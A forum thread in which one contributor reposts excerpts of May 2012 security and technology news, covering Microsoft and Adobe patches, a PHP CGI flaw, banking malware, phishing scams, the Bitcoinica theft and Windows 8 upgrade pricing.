Microsoft makes good with a 23-fix Patch Tuesday

Busy Wednesday for BOFH
By Iain Thomson in San Francisco
Posted in Security, 9th May 2012 00:48 GMT
It'll be all hands to the pumps in IT departments around the globe as Microsoft has issued this month's round of patches. There are 23 flaws to be fixed.

The seven patches include three critical issues, affecting Microsoft Windows, Office, Silverlight, and the .NET Framework. One patch, MS12-034, is specifically aimed at fixing possible attack vectors for the Duqu malware that Redmond initially blocked in December. It sorts ten flaws, some of which are publicly disclosed.

"Duqu is no longer able to exploit that vulnerability after applying the security update. However, we wanted to be sure to address the vulnerable code wherever it appeared across the Microsoft code base," blogged Jonathan Ness from Microsoft's security research center engineering team.

"To that end, we have been working with Microsoft Research to develop a 'Cloned Code Detection' system that we can run for every MSRC case to find any instance of the vulnerable code in any shipping product."

Microsoft's second highest priority is a critical flaw in Word that allows remote code execution from malware accessed via email and websites. One exploit is in the wild but doesn't give admin access, and Office 2010 users don't need to fix this.

http://www.theregister.co.uk/2012/05/09/microsoft_...

--
mogs CClip 57
Expert Contributor 9th May, 2012 08:26
Twitter says many leaked passwords inaccurate, duplicates
Many accounts were used for spamming and have been suspended, Twitter said

By Jeremy Kirk
May 8, 2012 08:14 PM
IDG News Service - Many of the Twitter logins and passwords leaked on the web this week are either inaccurate or belong to accounts already suspended for spamming, the company said late Tuesday.

The logins and passwords were published Monday on Pastebin, a website intended for programmers to share code but favored by hackers to release stolen data. The data was published on five separate posts on Pastebin, comprising a total of 58,978 login and password combinations.

"We've discovered that the list of alleged accounts and passwords found on Pastebin consists of more than 20,000 duplicates, many spam accounts that have already been suspended and many login credentials that do not appear to be linked," Twitter said via email. "The password and username are not actually associated with each other."

More at :-
http://www.computerworld.com/s/article/9226997/Twi...

--
mogs CClip 58
Expert Contributor 9th May, 2012 20:38
PHP patches actively exploited CGI vulnerability
PHP 5.4.3 and PHP 5.3.13 include fix for PHP CGI vulnerability that is being actively exploited to compromise websites

By Lucian Constantin
May 9, 2012 08:44 AM
IDG News Service - The PHP Group has released PHP 5.4.3 and PHP 5.3.13 on Tuesday in order to address two remote code execution vulnerabilities, one of which is being actively exploited by hackers.

"The releases complete a fix for a vulnerability in CGI-based setups (CVE-2012-2311)," the PHP developers said in the release notes. Additionally, PHP 5.4.3 fixes a buffer overflow vulnerability, identified as CVE-2012-2329, in the apache_request_headers() function.

The CVE-2012-2311 vulnerability, also known as CVE-2012-1823, was publicly disclosed last week and prompted the PHP Group to release PHP 5.3.12 and PHP 5.4.2 as emergency security updates in order to resolve it, on May 3.

Unfortunately, the initial patch proved to be ineffective against all variations of the exploit for CVE-2012-1823, and the manual workaround suggested by the PHP developers when releasing the emergency updates was easy to bypass as well.

The PHP developers investigated the issue further and published a new workaround on Sunday. They also promised to have a new working patch ready on Tuesday.

More at :-
http://www.computerworld.com/s/article/9227012/PHP...

--
mogs CClip 59
Expert Contributor 9th May, 2012 20:50
ICANN targets May 22 to resume name expansion
May 9, 2012
(AP) -- The organization behind a major expansion of Internet address suffixes hopes to resume taking proposals on May 22 following a technical glitch that shut down its computer system for weeks.
Last month, the Internet Corporation for Assigned Names and Numbers abruptly shut down a system for letting companies and organizations propose new suffixes, after it discovered a software glitch that exposed some private data. The data in some cases offered clues about which companies were proposing what suffixes, which was supposed to be confidential. ICANN says it has no evidence that anyone intentionally viewed the data.
If it can accept proposals again, the application window will run until May 30.
Up to 1,000 domain name suffixes - the ".com" part of an Internet address - could be added each year.

http://phys.org/news/2012-05-icann-resume-expansio...

--
mogs CClip 60
Expert Contributor 9th May, 2012 20:59
The Queen Confirms Internet Monitoring Law During Speech (Video)

During her speech in front of the United Kingdom’s Parliament, the Queen confirmed that the government intends on introducing the controversial legislation that would allow law enforcement and intelligence agencies to monitor the Internet and other types of communications.

“My Government intends to bring forward measures to maintain the ability of the law enforcement and intelligence agencies to access vital communications data under strict safeguards to protect the public, subject to scrutiny of draft clauses,” the Queen said.

Those who oppose the dreaded law are upset with the fact that the technical details are kept secret.

“The Home Office have been very good at saying what the problem is, but seem intent on keeping the technical details of what they are proposing secret. Is it any wonder that the public are scared by a proposal for online surveillance not seen in any other Western democracy,” Nick Pickles of the Big Brother Watch organization wrote after the speech.

“They also seem keen to avoid talking about the Black Boxes for real time monitoring capability that we still believe to be part of the plan,” he added.

For now we can only speculate about the effects of such a law, but, most likely, UK authorities will try to sweeten the deal and say that everything is being done to protect individuals and not to violate their rights, or to censor them.

When the Home Office mentioned the law last month, its representatives argued that it’s necessary for the police to be able to access communications while investigating serious crimes or terrorism.

It remains to be seen how hacktivists react to this news. So far they’ve only targeted the sites of the Home Office and the one of the Government Communications Headquarters (GCHQ), but now that the plan is clear, protest can be expected to escalate significantly.

The complete speech can be viewed in the video provided by the UK Parliament:

http://news.softpedia.com/news/The-Queen-Confirms-...

--
mogs CClip 61
Expert Contributor 9th May, 2012 21:06
Download OpenOffice 3.4 Stable
Apache Software Foundation just released the stable version for OpenOffice 3.4.0, which now goes under the name of Apache OpenOffice. It touts improved support for ODF, better graphics and performance improvements, which include a faster startup.

The new version of the suite supports the new ODF 1.2 encryption options and new spreadsheet functions. Documents encrypted with AES256 algorithm are now recognized and decrypted when the correct password is provided.

As far as graphics is concerned, the improvements refer to line caps, shear transformations and native support for Scalable Vector Graphics (SVG).

Chart viewing is better in the latest revision as it is driven by a new mechanism that increases speed, reduces memory usage and improves chart visualization in all visualizations, including PDF export and printing.

There is also a new regular expressions engine (ICU), which provides better standards compliance especially regarding Unicode, eliminates bugs in "Find and Replace" and speeds up the search process.

There is a full list of changes available on this page. Download Apache OpenOffice.

http://news.softpedia.com/news/Download-OpenOffice...

--
mogs CClip 62
Expert Contributor 10th May, 2012 07:20
Beta Channel Update
Wednesday, May 9, 2012 | 18:26
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.46 for Windows, Mac, Linux, and Chrome Frame.

Take a look at the changelog to see what happened in this release.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 63
Expert Contributor 10th May, 2012 07:27
Anonymous takes the Kremlin offline in Putin protest

Hacktivist group reacts as former president sweeps back to power
By Phil Muncaster

Posted in Security, 10th May 2012 02:58 GMT
Hacktivist group Anonymous has been up to its old tricks again, this time briefly taking out the web site of the Russian president as a show of support for the growing opposition to newly re-crowned leader Vladimir Putin.

Like most of the group's DDoS campaigns, the attack only temporarily disrupted the kremlin.ru site, which is back online now, according to reports.

More at :
http://www.theregister.co.uk/2012/05/10/anonymous_...

--
mogs CClip 64
Expert Contributor 10th May, 2012 21:03
Apple patches Safari, blocks outdated Flash Player
Yanks Flash plug-ins older than November 2010 version from browser

By Gregg Keizer
May 9, 2012 10:09 PM
Computerworld - Apple on Wednesday patched four security vulnerabilities in Safari and blocked outdated versions of Adobe's Flash Player from running in its browser.

The Flash blocking move was similar to one Apple made last month when it stopped the Java plug-in from launching automatically.

Safari 5.1.7, which runs on OS X 10.6 and 10.7 -- Snow Leopard and Lion, respectively -- as well as on Windows XP, Vista and Windows 7, was released alongside another update for Lion that included a slightly-older version of the browser. Lion users must download and install both updates to push Safari to version 5.1.7.

The four security flaws fixed were the same ones patched Tuesday in iOS 5.1.1 for the iPhone, iPad and iPod Touch. All were labeled as bugs in WebKit, the open-source rendering engine that powers Safari as well as Google's Chrome.

More at :-
http://www.computerworld.com/s/article/9227038/App...

--
mogs CClip 65
Expert Contributor 11th May, 2012 09:17
Microsoft touts Windows 8's ability to detect, fix hard disk problems
The new operating system makes the process faster and less disruptive to the operation of the computer

By Juan Carlos Perez
May 10, 2012 04:46 PM ET
IDG News Service - Microsoft has revamped the way Windows 8 monitors hard disk operations and detects problems in an effort to make the diagnostic and repair process less intrusive and disruptive, even as disk capacity continues to balloon.

The improvements in Windows 8 center on the ChkDsk utility, which inspects the hard disk and checks for a variety of errors and problems. Until now, running ChkDsk has often been inconvenient because end users have to stop using the machine while the utility runs, and the scan can take a long time to complete.

Microsoft also tweaked NTFS, the Windows OS file system. Until now, the NTFS "health model" conceived the machine's hard disk as a single unit that was either well or damaged, and which thus was taken completely offline and made unavailable to the end user while ChkDsk ran, sometimes for hours.

"Downtime was directly proportional to the number of files in the volume," reads Microsoft's blog post late Wednesday authored by Kiran Bangalore, senior program manager of Windows Core Storage and File Systems.

In Windows 8, however, the NTFS scans for problems in the background while the system remains online, and an initial attempt to fix problems on-the-fly is done.

More at :-
http://www.computerworld.com/s/article/9227070/Mic...

--
mogs CClip 66
Expert Contributor 11th May, 2012 09:21
Trusteer Warns of New Financial Malware Variant

While the new version of the Tatanga malware is currently focused on Spanish banking customers, it may be spreading to other countries.

By Jeff Goldman

Trusteer researchers are warning of a new version of the Tatanga financial malware, which was first uncovered in May of last year.

"In the configuration file we captured, Tatanga notifies the online banking victim via a web browser injection that their bank is offering free insurance protection against online fraud," writes Trusteer's Ayelet Heyman. "The victim is then presented with a fake insurance account that claims to cover the total amount of funds in their bank account. This fake insurance account is actually a real bank account that belongs to a money mule. The victim is told that they will be protected against any losses from online fraud by this insurance coverage. In the final step, the victim is prompted to authorize a transaction that they believe is to activate the insurance coverage."

"In order to do this, they need to input the transaction authorization code sent by their bank to their mobile phone number," writes PCWorld's Lucian Constantin. "This code allows the malware to finalize the rogue transfer in the background and send the victim's money to the money mule ... The maximum sum that is transferred by the malware in a single transaction is €5,000 or about US $6,500."

"Oren Kedem, director of product marketing for Trusteer, says the new configuration of Tatanga, discovered last week, was initially aimed at customers of a specific bank in Spain, but he says the authors of it may be trying to spread it to customers of other banks," writes CIO.com's Taylor Armerding.

"Trusteer’s latest discovery is another indication that the cybercrime ecosystem isn’t short on creative and new techniques to optimize hosts that are already infected with malware," writes ZDNet's Dancho Danchev.

http://www.esecurityplanet.com/malware/trusteer-wa...

--
mogs CClip 67
Expert Contributor 11th May, 2012 09:26
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe Patches Security Flaws ... For a Price

The upgrades that patch the vulnerabilities cost as much as $249.

By Jeff Goldman

Adobe today released updates for Photoshop, Illustrator, Flash Professional and Shockwave Player.

"The highest-priority vulnerabilities among those patched Tuesday is a group of five flaws in Shockwave that can be used to run malicious code on vulnerable machines," writes Threatpost's Dennis Fisher. "The update applies to both Windows and Mac machines and Adobe is recommending that users upgrade to version 11.6.5.635. The Shockwave bugs are rated as a priority 2."

"Windows users can tell if they have Shockwave installed by checking for an entry for the program in the Add/Remove Programs listing from the Windows Control Panel," writes Krebs on Security's Brian Krebs. "If you don’t already have this program, I’d recommend keeping it that way. I seem to have gotten along fine without it for several years now, and going without it just means one less buggy application to patch."

The H Security reports that all of the updates, aside from the one for Shockwave, will cost a significant amount of money to install. "It costs $199 to upgrade from a previous version to Photoshop CS6 alone, and this update is recommended by Adobe because it fixes several critical security holes," the article states. "The other upgrades, for Illustrator and Flash Professional, which close security holes are also exclusively available to paying customers."

If you don't want to pay for the upgrades ($249 for Illustrator and $99 for Flash Professional), Adobe's security bulletins simply advise that you "follow security best practices and exercise caution when opening files from unknown or untrusted sources."

In other words, good luck.

http://www.esecurityplanet.com/patches/adobe-patch...

--
mogs CClip 68
Expert Contributor 11th May, 2012 09:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
May 10th, 2012, 12:07 GMT · By Eduard Kovacs
Shady Windows Technicians Use LogMeIn to Take Control of Devices

Scams in which an alleged Windows technician calls to say that your computer is sending error messages to them are not new, but it seems they will never get old. Norman experts reveal that in some cases the scammers will call even 5 times a day trying to convince their victims to purchase so-called cleaning/repair products.

The name of the department in which the crooks pretend to work changes from one situation to the other, but in most cases it has something to do with Microsoft or Windows.

“Windows Technical Care Department”, “Windows Service Department”, and “Windows-certified support agent” are just some of the variants used in these plots.

Of course, tech-savvy users are well aware that Microsoft never calls its customers out of the blue, and neither do security solutions providers. That’s why when you receive a call from someone who tells you to access a certain site and download a piece of software, you can be certain that you have become the target of scam artists.

In recent instances, victims have been asked to install the LogMeIn application to give the crooks easy access to the device. LogMeIn is certainly not a malicious program, but combined with social engineering, it can turn into a dangerous tool.

More at :-
http://news.softpedia.com/news/Shady-Windows-Techn...

--
mogs CClip 69
Expert Contributor 11th May, 2012 22:05
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft preps Windows 8 upgrade deal for early June debut, says report
Even with the offer, summer sales expected to remain 'lousy,' says analyst

By Gregg Keizer
May 11, 2012 12:52 PM ET
Computerworld - Microsoft will kick off a Windows 8 upgrade program for buyers of Windows 7 PCs in early June, according to a report.

But unlike past deals, this one may come with a price tag.

The program will, said CNET yesterday, provide a discounted upgrade to Windows 8 to anyone who purchases a new Windows 7-powered PC between June 2012 and January 2013.

Citing unnamed sources, CNET said that the upgrade offer would let buyers of Windows 7 systems purchase Windows 8 Pro -- the highest-priced edition that will be sold at retail -- for an undisclosed price.

The offer will debut at the same time that Microsoft launches Windows 8 Release Preview, which the company has pegged to the first week of June. The most likely date is June 5, assuming Microsoft follows the same schedule it used in 2009 to deliver Windows 7's release candidate.

More at :-
http://www.computerworld.com/s/article/9227092/Mic...

--
mogs CClip 70
Expert Contributor 11th May, 2012 22:10
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Amnesty International UK website compromised
Malicious code on Amnesty International website exploited a Java vulnerability to install Gh0st RAT on computers

By Lucian Constantin
May 11, 2012 11:41 AM ET
IDG News Service - The U.K. website of Amnesty International, a human rights watchdog organization, was compromised by hackers, who used it to infect visitors with a remote access Trojan horse program known as Gh0st RAT, security firm Websense reported on Friday.

Websense's automated malware scanners detected the compromise on the Amnesty site on Tuesday and Wednesday, Websense security researcher Gianluca Giuliani, said in a blog post on Friday. The attackers managed to inject malicious code that attempted to exploit a Java vulnerability known as CVE-2012-0507 into the site's homepage, he said.

The same vulnerability was exploited earlier this year to infect more than 600,000 Mac computers with the Flashback malware. It was patched in Java for Windows back in February and in Java for Mac in April.

The exploit code used in this attack appears to have been copied from Metasploit, an open source penetration testing framework popular among security professionals, Giuliani said.

More at :-
http://www.computerworld.com/s/article/9227091/Amn...

--
mogs CClip 71
Expert Contributor 11th May, 2012 22:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
FBI: Updates Over Public ‘Net Access = Bad Idea

The Federal Bureau of Investigation is advising travelers to avoid updating software while using hotel or other public Internet connections, warning that malicious actors are targeting travelers abroad through pop-up windows while they are establishing an Internet connection in their hotel rooms.

From the FBI’s advisory:

“Recently, there have been instances of travelers’ laptops being infected with malicious software while using hotel Internet connections. In these instances, the traveler was attempting to set up the hotel room Internet connection and was presented with a pop-up window notifying the user to update a widely used software product. If the user clicked to accept and install the update, malicious software was installed on the laptop. The pop-up window appeared to be offering a routine update to a legitimate software product for which updates are frequently available.”

Read more at :-
http://krebsonsecurity.com/category/latest-warning...

--
mogs CClip 72
Expert Contributor 11th May, 2012 22:25
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
- Strengthens protection against XSS vulnerabilities
NoScript extension for Firefox keeps improving by adding security against new exploitation methods. Besides fixing up two issues, build 2.4.1 also integrates protection against two new XSS vulnerabilities.

It can now keep you safe against exploitation of classic MS ASP's coalescing of same-name query parameters. On the same note, it features protection against URL injections in window.name. Also added in this build is the type check exception to the lesscss Google Code file repository, which is often used as a CDN.

As far as mending goes, NoScript 2.4.1 fixes a case-sensitivity bug in the detection of Unicode escape sequences and the "Allow sites open through bookmarks" regression.

The current stable version was preceded by three release candidates, each solving its share of issues.

The entire list of changes for this update is available on this page. Download NoScript extension for Firefox

http://news.softpedia.com/news/Download-NoScript-2...

--
mogs CClip 73
Expert Contributor 12th May, 2012 05:02
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Friday, May 11, 2012 | 14:00
Labels: Dev updates
The Dev channel has been updated to 20.0.1132.3 for Windows, Mac, Linux, and Chrome Frame. This build contains update for several fixes. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 74
Expert Contributor 12th May, 2012 05:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Internet safe spot planned at ".secure" domain
May 11, 2012 by Glenn Chapman
Internet security specialists have applied for a ".secure" domain that they plan to turn into an online safe zone where bad guys aren't allowed.
San Francisco-based Artemis was awaiting word Friday from the Internet Corporation for Assigned Names and Numbers (ICANN) on whether it was approved to host websites with ".secure" addresses.
"We are creating a safe neighborhood where you know people follow the rules and you can rely on them to do things securely," Artemis chief technical officer Alex Stamos told AFP.
"There is not going to be typo squatting or malware... We are going to make it really air tight so even if you were in Syria the Syrian government couldn't hijack you."
Commonly available, but typically unused, technology tools for thwarting online hackers, viruses, snoops, spies and scammers will be mandatory at websites with .secure addresses.
"The idea is to make it effortlessly secure for individuals," Stamos said.
"In the end, the actual technical security tactics are things (websites) should be doing anyway. We are just making it a requirement."
Plans for .secure were part of an Internet domain name "revolution" that remained on hold due to a flaw that let some aspiring applicants peek at unauthorized information at the ICANN registration website.
ICANN intends to resume taking applications on May 22 from those interested in running new generic top-level domains (gTLDs) online, with the window staying open for about five days.

Read more at :-
http://phys.org/news/2012-05-internet-safe-domain....

--
mogs CClip 75
Expert Contributor 12th May, 2012 05:22
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Get a detailed diagnostic report on your computer with HijackThis
This free tool will report on Windows Registry and file settings on your PC
Tim Smith Download review Problem solving 11/05/2012
Get a detailed report on changes made to your computer using HijackThis

Fixing the changes made by malicious software can be a tricky business, but initially you have to discover exactly what was changed in the first place. HijackThis is a helpful tool that will create a report of suspicious changes and can be used to reverse them.
There is no installation. Just run the downloaded file to get started.
The main menu shows all of the different tools in HijackThis. The first option is to run a system scan and save the results in a text file. The option below just runs the scan but there isn't much point in not saving the results.
The scan doesn't take long, even on a computer that has seen a lot of changes such as our test machine. All the changes made to the Registry and settings are shown with a simple code identifying the type of change.
Changes can range from a new home page for Internet Explorer to search engines in other browsers. A full list of the codes and their meanings can be found by clicking on the Info button.
More details about changes can be found by clicking on them and then the Info on selected item button.
The Analyze This button takes you to the HijackThis forum hosted by TrendMicro to share the results of the scan and to look for advice. A HijackThis report is often requested on our own forums.
HijackThis can be used to reverse the changes it finds. Select items using the check boxes and click on the Fix checked button. We would echo the warnings in HijackThis that you should only do this if you know exactly what the change will do.
While the results may not make a lot of sense when they first appear, this is a valuable tool for getting help with computer problems as it gives the experts the information they need.


Read more: http://www.computeractive.co.uk/ca/download-review...


--
mogs CClip 76
Expert Contributor 12th May, 2012 10:18
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Viewpoint: Preparing for the digital defence of the realm
By Simon McCalla
Director of IT, Nominet

The notion of a co-ordinated cyberthreat has moved from the abstract to being all too real for many of us in the last few years.

From a theoretical risk to a tangible reality, the attacks by Anonymous on a variety of UK internet sites including the UK government, breaches of global giants like Sony and the debate that surrounded the digital discussion during the London riots truly transformed cybersecurity from a topic that was the province of technologists to a down-the-pub discussion that affects the everyday citizen.

The UK government is pledging hundreds of millions of pounds to defend the realm from cyber-attacks, but they are just one player in an inter-connected web of stakeholders looking to keep the internet in the UK safe, secure, trusted and contributing to Britain's economic growth and recovery.

It's not all about the spooks, digital or otherwise, and we need to be ready.

Read more at :-
http://www.bbc.co.uk/news/technology-18032278

--
mogs CClip 77
Expert Contributor 12th May, 2012 22:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

“Diablo 3 Free Download” Scams Fill the Pockets of Cybercriminals
Cybercriminals and online fraudsters are well aware of the fact that many users will want to download Diablo III, the latest version of the famous RPG game. That is why they are trying to lure unsuspecting gamers to their malicious sites with “Diablo 3 free download” offers.

In fact, as Trend Micro security experts warn, many of the Google results that appear after searching for “diablo 3 free download” actually point to shady sites.

Users who fall for these traps and click on the result links are taken to sites that display a big “Download Now” button. Once pressed, another website appears, requesting the user to complete an “offer” to gain access to the highly desired content.

These offers, better known as the classic affiliate survey scams, include topics such as “Discover your fortune”, “iWinners”, or something for the Spanish speakers which reads, “Recibe la major musica, videos e imagines directamente a tu movil.”

Each time someone completes one of these surveys, the crooks earn a certain amount of money from shady online marketing companies.

In another scenario, the potential victim is taken to a website that’s promoted as a YouTube page. Here, he/she is presented with instructions that must be followed in order to download the beta version of Diablo III for free.

As in many similar cases, Facebook is involved. The scheme must be shared, Liked, and posted on three different pages of the social media website.

Only after these steps are completed the fun begins. Users are asked to answer a number of questions as part of a survey to unlock the content.

Of course, Diablo III is not the first game that’s used in malicious schemes, Grand Theft Auto and World of Warcraft being just a few of the many examples.

Gamers are advised to purchase the game only from trusted sources. Also it’s recommended that they stay away from “Diablo 3 free download” links.

http://news.softpedia.com/news/Diablo-3-Free-Downl...

--
mogs CClip 78
Expert Contributor 12th May, 2012 22:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Bitcoinica Taken Offline, More Than 18,000 Bitcoins Stolen

Bitcoinica has been taken offline by its administrators after they noticed a suspicious transaction. It’s believed that at least 18,000 BTC ($90,000 or 68,000 EUR) have been stolen.

“Today, we have discovered a suspicious Bitcoin transaction that doesn't seem to be initiated by any one of the company owners. Some of them are not online at the moment so this is not conclusive,” Bitcoinica representatives wrote.

“We have contacted Rackspace to suspend all our servers and lock down our accounts. All your trading and financial data is safe (as far as I know), apart from the Bitcoin loss.
Thank you for your patience and understanding while we investigate this issue in detail.”

Many criticized the site’s owners for keeping such amounts of currency on hosted systems instead of using offline transactions and disconnecting the wallets from the trading infrastructure, especially after the Linode incident.

However, Bitcoin representatives responded that 80% of the Bitcoins are in fact in offline wallets, but the large number of withdrawals forces them to keep a large balance accessible.

In a later post on the BitcoinTalk forum, a Bitcoinica employee revealed that the problem is far more serious than initially believed. They estimate that the entire platform will be shut down or even re-developed, an operation which may take months.

It appears that the incident may have been a result of a compromised email server that belongs to one of the teams.

In the meantime, until they get everything back and running, they advised users not to reuse their passwords, but also to be on the lookout for phishing emails that may leverage this unfortunate event.

The incident comes after a few days ago the FBI released a report in which it detailed the fact that Bitcoins represent a great currency for cybercriminals who want their illegal activities to go by unnoticed.

http://news.softpedia.com/news/Bitcoinica-Taken-Of...

--
mogs CClip 79
Expert Contributor 12th May, 2012 22:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft Prepares New Antimalware Engine Release for May 15th, 2012

On May 15th, 2012, Microsoft will release a new Antimalware Engine to address security threats out there. The new release is part of the regular antimalware technology updates that Microsoft is pushing out each month.

According to the Redmond-based software giant, the upcoming Antimalware Engine iteration will affect products such as Microsoft Security Essentials, Forefront Client Security, Forefront Endpoint Protection, Windows Intune Endpoint Protection.

Additionally, the company notes that the new Engine will come out of its laboratories with a version in the range of 1.1.840X.0. Additional details on the matter are expected to be pushed out along with the official release.

Last month, the software behemoth made available for download Antimalware Engine version 1.1.8304.0. The release was delivered to all of the affected Microsoft customers starting April 18th.

http://news.softpedia.com/news/Microsoft-Prepares-...

--
mogs CClip 80
Expert Contributor 13th May, 2012 12:05
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe backpedals, will now patch software for free
Changes tune after customers, security pros condemned Adobe's advice to spend hundreds on upgrades to get fixes

By Gregg Keizer
May 12, 2012 06:47 PM ET
Computerworld - After being pummeled by customers and security experts for telling users to spend hundreds of dollars on upgrades because it wasn't going to patch critical bugs in older versions of its software, Adobe has reversed course.

The company will now fix the eight vulnerabilities in the one-year-old Illustrator and Flash Professional CS5.5, and the two-year-old Photoshop CS5, an Adobe spokeswoman said via email late Friday.

There will be no charge for the updates.

A post by Adobe's product security response team to its official blog spelled out the change.

Read more at :-
http://www.computerworld.com/s/article/9227119/Ado...

--
mogs CClip 81
Expert Contributor 14th May, 2012 08:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Senate to look at Mozilla's browser competition allegations
Sen. Herb Kohl's office to examine Mozilla's complaint against Microsoft over browser API access in Windows RT

By Gregg Keizer
May 13, 2012 03:30 PM ET
Computerworld - The U.S. Senate Judiciary Committee will look into accusations by Mozilla that Microsoft is restricting access to important programming tools for browsers that will run in Windows RT, a political blog reported Friday.

The Hill cited unnamed aides to Sen. Herb Kohl (D-Wis.), the chairman of the Subcommittee on Antitrust, Competition Policy, and Consumer Rights, as the source for its report.

Last week, Mozilla, the maker of Firefox, said Microsoft was withholding access to APIs -- application programming interfaces -- that Mozilla considers crucial for building a browser that can compete with Microsoft's own Internet Explorer 10 (IE10) on ARM devices.

More at :-
http://www.computerworld.com/s/article/9227121/Sen...

--
mogs CClip 82
Expert Contributor 14th May, 2012 21:06
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe changes course and patches Photoshop for free
Adobe has apparently changed its mind about requiring customers to pay to get recent security patches for its Photoshop, Illustrator and Flash Professional products.

The patches cover vulnerabilities in Creative Suite 5 and earlier versions of the products that could let a remote intruder execute malicious code and take control of computers running the software. Adobe had originally said customers would need to pay to upgrade to the Creative Suite 6 versions to get the fixes.

"We are in the process of resolving the vulnerabilities...in Adobe Illustrator CS5.x, Adobe Photoshop CS5.x (12.x) and Adobe Flash Professional CS5.x, and will update the respective security bulletins once the patches are available," Adobe said in a post to its security blog on Friday.

More at :-
http://www.zdnet.co.uk/news/security-threats/2012/...

--
mogs CClip 83
Expert Contributor 14th May, 2012 21:11
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Phishers to Hotmail Users: Your Account Has Been Blocked

Hotmail customers are advised to be on the lookout for emails entitled “E-mail account alert!” which notify them that their accounts have been blocked. These messages hide a link which points to a malicious website that urges the potential victim to provide his login credentials.

Here’s part of the shady notification, provided by the folks from Hoax Slayer:

This e-mail has been sent to you by Hotmail to inform you that your account has been blocked.

Why are you seeing this? Someone may have used your account to send out a lot of junk messages (or something else that violates the Windows Live Terms of Service). We're here to help you get your account back. What do you need to do?

We'll ask you to login to our secured activation page by following the link below and re-activate your account.
[Link]

If you have already confirmed your account information then please disregard this message.

Users who fall for the scam and click on the shady link are taken to a website that almost perfectly replicates the genuine Windows Live login webpage. Once the username and password are provided, the unsuspecting victim is taken to the legitimate website.

More at :-
http://news.softpedia.com/news/Phishers-to-Hotmail...

--
mogs CClip 84
Expert Contributor 14th May, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
MoD to warn of E-bomb attack
The UK needs to build its digital defences, defence secretary Philip Hammond will say

By Anh Nguyen | Computerworld UK | 14 May 12
The UK needs to defend itself against an electromagnetic pulse-based 'E-bomb' that could knock out all electronic systems, the defence secretary will say today.

Philip Hammond will tell a security conference in London that traditional defences based on "infantry or jet planes" would not be enough to protect the country from such an attack, and that Britain needs to spend money on building its digital defences.

"One of the challenges we face, particularly at a time of limited resources, is to make the case for spending on defence and security solutions that cannot readily be seen by the public - that cannot be shown off in the parade ground - that could be digital, not necessarily physical," Hammond is due to say, according to The Telegraph.

More at :-
http://www.pcadvisor.co.uk/news/security/3357548/m...

--
mogs CClip 85
Expert Contributor 15th May, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft to charge $15 for Windows 8 upgrade deal
Blogger pegs price for Windows 7 PC buyers during run-up to fall debut of new OS

By Gregg Keizer
May 15, 2012 11:30 AM ET
Computerworld - Microsoft will charge users who buy a new Windows 7 PC $14.99 for an upgrade to Windows 8, according to a report.

The cost of the upgrade was revealed yesterday by Paul Thurrott, a popular blogger who writes SuperSite for Windows.

An earlier report by CNET had claimed that Microsoft would charge a fee for the upgrade, but had not spelled out the amount. CNET said that the program would kick off alongside the delivery of Windows 8 Release Preview.

Microsoft has said it will ship the preview the first week of June. If the company follows the same schedule it used in 2009 to deliver Windows 7's release candidate, the most likely date is Tuesday, June 5.

More at :-
http://www.computerworld.com/s/article/9227169/Mic...

--
mogs CClip 86
Expert Contributor 15th May, 2012 21:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Wikipedia warns users about malware injecting ads into its pages
The normally ad-free site says some visitors have encountered a browser-based malware infection

By Lucian Constantin
May 15, 2012 02:33 PM ET
IDG News Service - Visitors to Wikipedia who see advertisements on the site have most likely fallen victim to a browser-based malware infection, Wikimedia Foundation, the organization operating the website, said on Monday.

"We never run ads on Wikipedia," said Philippe Beaudette, director of community advocacy for the Wikimedia Foundation, in a blog post. "If you're seeing advertisements for a for-profit industry ... or anything but our fundraiser, then your web browser has likely been infected with malware."

One example of such malware is a rogue Google Chrome extension called "I want this," Beaudette said. However, similar malicious add-ons might also exist for Mozilla Firefox, Internet Explorer and other browsers, he said.

This type of malicious software is known as click fraud malware and can target multiple websites at once. In addition to injecting ads into Web pages, such rogue extensions are also known to hijack search queries in order to earn their creators affiliate revenue, said Graham Cluley, a senior technology consultant at Sophos, in a blog post Tuesday.

Read more at :-
http://www.computerworld.com/s/article/9227179/Wik...

--
mogs CClip 87
Expert Contributor 15th May, 2012 21:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

EU-Microsoft browser deal requires ballot screen in Windows 8
Microsoft declines to comment on its interpretation of the 2009 settlement

By Gregg Keizer
May 14, 2012 04:19 PM ET
